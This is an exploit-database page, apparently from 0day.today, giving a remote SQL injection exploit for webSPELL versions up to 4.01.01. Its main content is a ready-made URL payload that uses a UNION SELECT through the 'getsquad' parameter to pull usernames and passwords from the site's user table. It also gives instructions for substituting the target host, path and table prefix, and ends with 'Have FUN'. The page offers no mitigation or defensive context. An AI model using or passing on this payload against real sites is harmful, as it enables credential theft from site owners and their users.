[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit

Author
Kiba
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1004
Category
web applications
Date add
14-10-2006
Platform
unsorted
===========================================================
webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit
===========================================================



 # WebSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit
 # by: Kiba

 #EXPLOIT:
 http://[PAGE]/[PATH]/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user/*

 #REPLACE:
 (if the website is http://yourwebsite.de/webspell/index.php)
 [PAGE]  with  "yourwebsite.de"
 [PATH]  with  "webspell" (if there is no subdirectory then remove it)
 [PREFIX] the Prefix of the database tables (try "webs_user")

 # Have FUN



#  0day.today [2024-11-15]  #